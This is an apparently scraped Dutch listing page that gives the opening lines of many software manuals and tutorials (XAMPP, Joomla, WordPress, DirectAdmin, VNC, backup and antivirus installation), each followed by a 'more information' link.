LES 3: XAMPP OF MAMP. Lesoverzicht: LES 3: XAMPP OF MAMP Lesoverzicht: Aan de slag Wat is XAMPP (Windows & Linux) Installatie XAMPP Gebruik van XAMPP Wat is MAMP (Mac) Installatie MAMP Gebruik van MAMP Samenvatting Tijd: 15 minuten Doel:

Nadere informatie

- Plan Zo kun je een. website bouwen!

- Plan Zo kun je een. website bouwen! - Plan Zo kun je een website bouwen! BoekjeHoeKanJeEenWebsiteBouwen.i1 1 8-7-2008 17:23:14 BoekjeHoeKanJeEenWebsiteBouwen.i2 2 8-7-2008 17:23:15 In dit boekje staat de uitgebreide versie van hoe je een

Nadere informatie

Inhoudsopgave... 1. Handleiding: firmware GXP-telefoons upgraden via http... 2. Handleiding: firmware GXP-telefoons upgraden via TFTP...

Inhoudsopgave... 1. Handleiding: firmware GXP-telefoons upgraden via http... 2. Handleiding: firmware GXP-telefoons upgraden via TFTP... Inhoudsopgave Inhoudsopgave... 1 Handleiding: firmware GXP-telefoons upgraden via http... 2 Handleiding: firmware GXP-telefoons upgraden via TFTP... 3 1) Download een TFTP-programma:... 3 2) Maak uw GXP-2000/2020

Nadere informatie

Chapter 4. eenvoudige webserver opzetten

Chapter 4. eenvoudige webserver opzetten Chapter 4. eenvoudige webserver opzetten Table of Contents 4.1. overzicht... 44 4.2. software beheren op Linux... 44 4.3. vi... 45 4.4. html... 45 4.5. apache2... 45 4.6. twee extra websites op de apache

Nadere informatie

1 "log-file": "/var/log/pilight.log" 2 "log-file": "c:/pilight/pilight.log"

1 log-file: /var/log/pilight.log 2 log-file: c:/pilight/pilight.log Instellingen Instellingen...1 Introductie...2 Basis...2 port...2 standalone...2 pid-file...2 log-file...2 log-level...2 whitelist...3 stats-enable...3 watchdog-enable...3 Module paden...4 action-root...4

Nadere informatie

Over PHP. PHP en MySQL. 1.1 Inleiding. In dit hoofdstuk maak je kennis met PHP. Hoe werkt deze

Over PHP. PHP en MySQL. 1.1 Inleiding. In dit hoofdstuk maak je kennis met PHP. Hoe werkt deze Over PHP 1.1 Inleiding In dit hoofdstuk maak je kennis met PHP. Hoe werkt deze programmeertaal? En hoe is het ontstaan? Ook leer je welke editors je kunt gebruiken om PHP-scripts te maken en hoe je eenvoudig

Nadere informatie

Globale kennismaking

Globale kennismaking Globale kennismaking Kennismaking Tesla CMS 1. Dashboard 2. pagina beheer - pagina aanmaken - pagina aanpassen - pagina verwijderen - pagina seo opties - zichtbaarheid pagina 3. subpagina beheer - subpagina

Nadere informatie

NACSPORT TAG&GO HANDLEIDING. 3.2.1. Eigenschappen knop

NACSPORT TAG&GO HANDLEIDING. 3.2.1. Eigenschappen knop Handleiding NACSPORT TAG&GO HANDLEIDING 1. Introductie 2. Configureren en bestellen 3. Sjabloon (categorieën en descriptors) 3.1 Lijst sjablonen 3.2 Sjablonen bewerken 3.2.1. Eigenschappen knop 4. Analyseren

Nadere informatie

VMBO-ICT-Route examen 2009 Naam: Marc Schattorie Datum: 06-03-09

VMBO-ICT-Route examen 2009 Naam: Marc Schattorie Datum: 06-03-09 VERSLAG BICS INSTRUCTIIEFIILMPJES VMBO-ICT-Route examen 2009 Naam: Marc Schattorie Datum: 06-03-09 Inhoudsopgave Gebruik BICS..blz. 3 Onderzoek naar korte instructiefilms...blz. 3 Onderzoek naar screenrecorders.blz.

Nadere informatie

JPTrain. JPTrainBeta versie 25 mei 2015. Android client voor GBtrainHost

JPTrain. JPTrainBeta versie 25 mei 2015. Android client voor GBtrainHost JPTrain JPTrainBeta versie 25 mei 2015 Android client voor GBtrainHost Inhoud 1. Benodigd voor JPTrain... 3 2. Installatie JPTrain... 3 2.1 Conversie van oude versie(s)... 3 3. Eerste kennismaking met

Nadere informatie

Handleiding DirectAdmin

Handleiding DirectAdmin Handleiding DirectAdmin Heeft uw hostingpakket het control panel DirectAdmin dan leest u in deze sectie hoe u uw pakket kunt beheren. Dat doet u via : http://www.uwdomein.nl:2222. 1 Inloggen Voordat u

Nadere informatie

Standaard Asta Powerproject Client Versie 13 Installatiedocument v1

Standaard Asta Powerproject Client Versie 13 Installatiedocument v1 Standaard Asta Powerproject Client Versie 13 Installatiedocument v1 22 oktober 2015 Voor vragen of problemen kunt u contact opnemen via: telefoonnummer 030-2729976. Of e-mail naar support@powerproject.nl.

Nadere informatie

Beheerdershandleiding. Versie: 1.0.3

Beheerdershandleiding. Versie: 1.0.3 Beheerdershandleiding Versie: 1.0.3 Inhoudsopgave 1 Inleiding 2 Uw site uploaden met ftp 3 Mail beheer 3.1 Beheren van mail namen 3.2 Aanzetten mail services 3.3 Mail redirect 3.4 Mail groepen 3.5 Beheer

Nadere informatie

Handleiding WIS TM Live-editing Live editing is een WIS TM module

Handleiding WIS TM Live-editing Live editing is een WIS TM module Handleiding WIS TM Live-editing Live editing is een WIS TM module Live-edit 1. Inleiding De nieuwe versie van WIS tm beschikt over een aantal nieuwe functionaliteiten, waarvan vooral liveediting als nieuwe

Nadere informatie

Het installeren van de software.

Het installeren van de software. Inhoudsopgave Inhoudsopgave... 1 Het installeren van de software.... 2 De Printserver Bekabeld Configureren... 8 Instellen van je IP adres... 10 Netwerk poorten configureren... 12 Een printer Toevoegen....

Nadere informatie

CMS Made Simple eenvoudig uitgelegd CMS MADE SIMPLE- Eenvoudig uitgelegd

CMS Made Simple eenvoudig uitgelegd CMS MADE SIMPLE- Eenvoudig uitgelegd CMS Made Simple eenvoudig uitgelegd CMS MADE SIMPLE- Eenvoudig uitgelegd Introductie Deze handleiding heeft tot doel een eenvoudige stap voor stap handleiding te zijn voor eindgebruikers van CMS Made Simple

Nadere informatie

Screencast-O-Matic HANDLEIDING

Screencast-O-Matic HANDLEIDING Screencast-O-Matic HANDLEIDING Inhoud 1 Inleiding 3 2 Stap voor stap 3 3 Conclusie 9 4 Meer info 10 4.1 Hulp nodig? 10 4.2 Vragen en opmerkingen 10 4.3 Trefwoordenlijst 10 4.4 Lijst met afbeeldingen 10

Nadere informatie

MULTIFUNCTIONELE DIGITALE SYSTEMEN

MULTIFUNCTIONELE DIGITALE SYSTEMEN MULTIFUNCTIONELE DIGITALE SYSTEMEN Installatie e-bridge Re-Rite 7 Installatie Re-Rite 7 Set-up starten Start de set-up uit de installatie map De InstallShield Wizard wordt gestart De Visual C++ Runtime

Nadere informatie

Handleiding. Act! SnelStart Connect. handleiding. Act! SnelStart Connect. Versie 1.0 12-12-2013

Handleiding. Act! SnelStart Connect. handleiding. Act! SnelStart Connect. Versie 1.0 12-12-2013 Act! SnelStart Connect Handleiding Versie 1.0 12-12-2013 Inleiding Met SnelStart Connect kunt uw Act! database koppelen met uw SnelStart boekhouding. SnelStart Connect biedt u de mogelijkheid om de gegevens

Nadere informatie

Korte uitleg: Wat doet de shell met mijn commandoregel?

Korte uitleg: Wat doet de shell met mijn commandoregel? Korte uitleg: Wat doet de shell met mijn commandoregel? Het onderstaande is heel erg Bash gericht, maar geldt i.h.a. ook voor andere shells. Vooral als het om "begrip" gaat. Iedere regel die aan de shell

Nadere informatie

Software Test Plan. Yannick Verschueren

Software Test Plan. Yannick Verschueren Software Test Plan Yannick Verschueren November 2014 Document geschiedenis Versie Datum Auteur/co-auteur Beschrijving 1 November 2014 Yannick Verschueren Eerste versie 1 Inhoudstafel 1 Introductie 3 1.1

Nadere informatie

MyMediasite Handleiding 2013 - V1.0

MyMediasite Handleiding 2013 - V1.0 MyMediasite Handleiding 2013 - V1.0 1 INHOUDSOPGAVE 1. INSTALLATIE 3 2.1 OPNEMEN: OPSTARTEN 4 2.2 OPNEMEN: NIEUWE PRESENTATIE 5 2.3 OPNEMEN: OPNAME PROCES 7 2.4. OPNEMEN: EIGEN MEDIA UPLOADEN 11 3. PRESENTATIE

Nadere informatie

Handleiding website. Inloggen Start uw internet browser en ga naar http://www.rbaoreven.nl/.

Handleiding website. Inloggen Start uw internet browser en ga naar http://www.rbaoreven.nl/. Handleiding website In deze handleiding staat alles wat u nodig heeft om een bericht op de website van de Reddingsbrigade Aoreven Heythuysen te plaatsen. Alles wordt in woord en beeld uitgelegd. Inloggen

Nadere informatie

Standaard Asta Powerproject Client Versie 12 Installatiedocument v1

Standaard Asta Powerproject Client Versie 12 Installatiedocument v1 Standaard Asta Powerproject Client Versie 12 Installatiedocument v1 4 september 2012 Voor vragen of problemen kunt u contact opnemen via telefoonnummer 030-2729976. Of e-mail naar support@powerproject.nl.

Nadere informatie

Handleiding Joomla CMS

Handleiding Joomla CMS Handleiding Joomla CMS Inhoudsopgave Inloggen bij de beheeromgeving 3 Artikelen 4 Prullenbak bekijken 4 Nieuw artikel maken / bewerken 5 Afbeelding toevoegen aan artikel 6 Link in een artikel plaatsen

Nadere informatie

Handleiding DirectAdmin

Handleiding DirectAdmin Handleiding DirectAdmin Heeft uw hostingpakket het control panel DirectAdmin dan leest u in deze sectie hoe u uw pakket kunt beheren. Dat doet u via : http://www.uwdomein.nl:2222. Handleiding DirectAdmin

Nadere informatie

1. Hardware Installatie...3 2. Installatie van Quasyscan...6 A. Hoe controleren of je een actieve internetverbinding hebt?...6 B.

1. Hardware Installatie...3 2. Installatie van Quasyscan...6 A. Hoe controleren of je een actieve internetverbinding hebt?...6 B. Quasyscan 1. Hardware Installatie...3 2. Installatie van Quasyscan...6 A. Hoe controleren of je een actieve internetverbinding hebt?...6 B. Zodra er een internetverbinding tot stand is gebracht...7 C.

Nadere informatie

Project verslag. Erwin Hannaart Sander Tegelaar 61849 62407

Project verslag. Erwin Hannaart Sander Tegelaar 61849 62407 Project verslag Erwin Hannaart Sander Tegelaar 61849 62407 I4C2 I4C1 Inhoudsopgave Website design... 3 Website functies... 4 Website index pagina... 5 Website product pagina... 7 Website registreren pagina...

Nadere informatie

Howto Subversion. 1. Subversion structuur en uitleg

Howto Subversion. 1. Subversion structuur en uitleg 1. Subversion structuur en uitleg Op de Adwise VDS server staan de repositories die gebruikt kunnen worden. Een subversion repository bevat alle projecten gerelateerd aan de betreffende repository. Adwise

Nadere informatie

Watcheye AIS op ipad

Watcheye AIS op ipad Watcheye AIS op ipad Deel uw NMEA / AIS informatie met uw ipad met tussenkomst van uw PC/Laptop. Het is mogelijk om de Watcheye AIS applicatie op uw ipad te koppelen met uw AIS, door de NMEA data die de

Nadere informatie

Inhoudsopgave. versie 0.8

Inhoudsopgave. versie 0.8 JOOMLA! INSTALLATIE HANDLEIDING versie 0.8 Inhoudsopgave Stappenplan...3 Inrichten database...4 Configuratiecentrum cpanel...4 Aanmaken van een database gebruiker...5 Aanmaken van een database...6 Gebruiker

Nadere informatie

R5.0. Bijlage IV. Video converter. Handleiding. Clixmaster Studio. Gebruikershandleidingen

R5.0. Bijlage IV. Video converter. Handleiding. Clixmaster Studio. Gebruikershandleidingen Bijlage IV R5.0 Video converter Gebruikershandleidingen Clixmaster Studio Handleiding 1/7 Bijlage IV - Video Converter 2010 Clixmaster BV Alle rechten voorbehouden. Niets uit deze uitgave mag worden verveelvoudigd,

Nadere informatie

Gebruikershandleiding

Gebruikershandleiding Gebruikershandleiding HitmanPro.Kickstart Gebruikershandleiding Page 1 Inhoudsopgave 1 Introductie HitmanPro.Kickstart... 3 2 Wat is ransomware?... 4 3 Waarom heb ik HitmanPro.Kickstart nodig?... 5 4 Het

Nadere informatie

Handleiding Reinder.NET.Tasks.SQL versie 2

Handleiding Reinder.NET.Tasks.SQL versie 2 Handleiding Reinder.NET.Tasks.SQL versie 2 Reinder Stolte Tramstraat 33 8771RR Nijland Inhoudsopgave 1 Algemeen... 2 2 Installeren en configureren... 3 3 Taken instellen... 4 3.1 Taskname (Taaknaam) verplicht

Nadere informatie

Temperatuur logger synchronisatie

Temperatuur logger synchronisatie Temperatuur logger synchronisatie Juni 10, 2010 1 / 7 Temperatuur logger synchronisatie Introductie Twee of meerdere ontvangers van het Multilogger systeem kunnen met de temperature logger synchronisatie

Nadere informatie

Webhosting Online Beginnen met Joomla v1.0

Webhosting Online Beginnen met Joomla v1.0 Webhosting Online Beginnen met Joomla v1.0 1 Inleiding KPN stelt met een abonnement op Webhosting Online Linux gratis het content management systeem Joomla voor u beschikbaar. Dit populaire programma om

Nadere informatie

Handleiding Wordpress

Handleiding Wordpress Handleiding Wordpress Inhoudsopgave 1. Inloggen 2. Berichten en Pagina s 3. Afbeeldingen en video s 4. Weblinks 1. Inloggen 1.1 Inloggen bij Wordpress We starten met het inloggen op je WordPress gebaseerde

Nadere informatie

Handleiding voor snelle installatie

Handleiding voor snelle installatie Handleiding voor snelle installatie ESET NOD32 Antivirus v3.0 ESET NOD32 Antivirus biedt de beste beveiliging voor uw computer tegen kwaadaardige code. Gebouwd met de ThreatSense scanmachine, die geïntroduceerd

Nadere informatie

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0 Inhoudsopgave Inleiding... 2 Key features... 2 Suggesties... 2 Inlog venster:... 3... 3... 3 General... 4... 4... 4 Advanced:... 5... 5... 5 Maplist:... 6... 6... 6 Players:... 7... 7... 7 Banlist:...

Nadere informatie

Pak de controle met VNC

Pak de controle met VNC Pak de controle met VNC Tijdens ons recentelijke SOACamp kwam ik er achter dat niet iedereen bekend is met het gemak van het overnemen van desktops en dan vooral hoe makkelijk het is. Vooral als je veel

Nadere informatie

TeD Tekst en Design. Basisinformatie voor gebruik van het cms Made Simple

TeD Tekst en Design. Basisinformatie voor gebruik van het cms Made Simple TeD Tekst en Design Basisinformatie voor gebruik van het cms Made Simple Klant: ----- Auteur: TeD Tekst en Design Datum: Mei 2009 TeD Tekst en Design Inhoudsopgave 1 Inleiding...3 2 Inloggen in het CMS...4

Nadere informatie

Installatie van WerkMeester

Installatie van WerkMeester Installatie van WerkMeester WerkMeester is een WIN32 database-applicatie op basis van een enkele executable, met een aantal werkbestanden en een MySQL database. De software is niet ontwikkeld voor gebruik

Nadere informatie

Stappenplan Scannen. Hoe te scannen: Start het programma ABBYY Finereader op

Stappenplan Scannen. Hoe te scannen: Start het programma ABBYY Finereader op Stappenplan scannen Hoe te scannen: Start het programma ABBYY Finereader op Het programma ABBYY Finereader is een programma waarmee makkelijk gescand kan worden. Het zorgt voor de OCR omzetting. Dit wil

Nadere informatie

Lined Content Management System v.2 (LCMS 2)

Lined Content Management System v.2 (LCMS 2) Lined Content Management System v.2 (LCMS 2) Inhoudsopgave Lined Content Management System v.2 (LCMS 2)...2 Wat is LCMS 2?...3 Hoe gebruik ik LCMS 2?...3 De modules...4 Instellingen...4 Gebruikers...4

Nadere informatie

Publiceren met WordPress

Publiceren met WordPress Publiceren met WordPress Peter Osterop Tweede herziene editie 1. Installatie van WordPress 2. Configuratie van WordPress 3. Het uiterlijk van WordPress 4. Pagina s en berichten maken in WordPress 1 Installatie

Nadere informatie

In de meeste netwerkomgevingen staan de firewalls het browsen of surfen op internet toe.

In de meeste netwerkomgevingen staan de firewalls het browsen of surfen op internet toe. m:\helpdesk\vgmbox\documenten\handleiding - inzet binnen beveiligd netwerk (dmv proxyserver) - 20110112 - tbv pdf.doc Inzet van De VGM Box binnen een beveiligd netwerk Dit document beschrijft het functioneren

Nadere informatie

Cloud2 Online Backup - CrashplanPRO

Cloud2 Online Backup - CrashplanPRO Cloud2 Online Backup - CrashplanPRO Handleiding- CrashplanPRO - Online Backup Download de clients hier: Windows 32- bit: http://content.cloud2.nl/downloads/back01- cra.backupnoc.nl/crashplan_x86.exe Windows

Nadere informatie

PhotoworkZ pop-up website handleiding

PhotoworkZ pop-up website handleiding PhotoworkZ pop-up website handleiding Inhoudsopgave PhotoworkZ pop-up website handleiding...1 Aanmelden op de admin module...2 Beheer van teksten...3 Tekst downloaden en aanpassen...3 Aanpassen van teksten...4

Nadere informatie

Augustus& Handleiding - Publisher Tool 3

Augustus& Handleiding - Publisher Tool 3 Augustus& 15 16 Handleiding - Publisher Tool 3 Inhoudsopgave 1. Welkom... 3 1.1 Inloggen... 3 1.2 Dashboard... 4 2. Boeken... 5 2.1 Boeken aanmaken... 5 2.2 Het bewerken van boekinformatie.... 7 3. Verrijkingen...

Nadere informatie

Webservice voor data-uitwisseling tussen FysioRoadmap en MRS Software

Webservice voor data-uitwisseling tussen FysioRoadmap en MRS Software Webservice voor data-uitwisseling tussen FysioRoadmap en MRS Software Contents Inleiding...1 Wanneer is het gebruik van de webservice nodig?...2 Welke stappen dienen uitgevoerd te worden om de webservice

Nadere informatie

Handleiding. Opslag Online voor Windows Phone 8. Versie augustus 2014

Handleiding. Opslag Online voor Windows Phone 8. Versie augustus 2014 Handleiding Opslag Online voor Windows Phone 8 Versie augustus 2014 Inhoudsopgave Hoofdstuk 1. Inleiding 3 Hoofdstuk 2. Installatie 4 2.1 Downloaden van KPN Opslag Online QR Code 4 2.2 Downloaden van KPN

Nadere informatie

Popsy Financials. Overstap Access-MSDE

Popsy Financials. Overstap Access-MSDE Popsy Financials Overstap Access-MSDE 1 Inhoudstafel 1/17 1 Installatie van een MSDE server... 3 1.1 Microsoft SQL Express 2008... 3 1.2 Aanmaken van ODBC connectie naar de server... 9 1.3 Voorbereiding

Nadere informatie

Analyse Programmeertalen

Analyse Programmeertalen Analyse Programmeertalen De keuze van een programmeertaal mag niet onderschat worden. Het is dankzij deze taal dat de gebruiker interactie heeft met het complete systeem. Het is dus vanzelfsprekend dat

Nadere informatie

Procedure Access - MSDE

Procedure Access - MSDE Procedure Access - MSDE Inhoudstafel INSTALLATIE VAN EEN MSDE SERVER 2 Microsoft SQL Express 2005 2 Microsoft SQL Express 2008 6 AANMAKEN VAN DE ODBC CONNECTIE NAAR DE SERVER 12 VOORBEREIDING VAN DE SERVER

Nadere informatie

Planbord installatie instructies

Planbord installatie instructies Planbord installatie instructies Uit Comprise Wiki Inhoud 1 Basis installatie 1.1 Installeren 1.1.1 Microsoft Data Access Components 1.2 De eerste keer starten 2 Veelgestelde vragen 2.1 "Network resource

Nadere informatie